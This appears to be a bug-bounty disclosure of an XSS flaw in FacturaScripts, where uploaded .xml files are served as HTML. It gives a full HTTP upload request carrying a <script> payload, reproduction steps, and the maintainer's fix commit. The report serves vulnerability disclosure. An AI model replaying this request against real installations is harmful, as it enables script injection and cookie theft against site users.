Cross-site scripting - Reflected via upload `.xml` file in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022

Description

When user upload a file with .xml extension and direct access this file, the server response with Content-type: text/html lead to processing XML as HTML file.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xml"
Content-Type: text/xml

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

Prepare a file xss.xml with content:

<script>alert(window.origin)</script>

Upload xss.xml file in Admin -> Library

Click download and XSS

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

References

https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

Carlos Garcia validated this vulnerability a year ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carlos Garcia

commented a year ago

Maintainer

Fixed here https://github.com/NeoRazorX/facturascripts/commit/31a6b6029cd95b2d64baac3d9209cc15e1f928e8

Carlos Garcia marked this as fixed in 2022.07 with commit 31a6b6 a year ago

Carlos Garcia has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation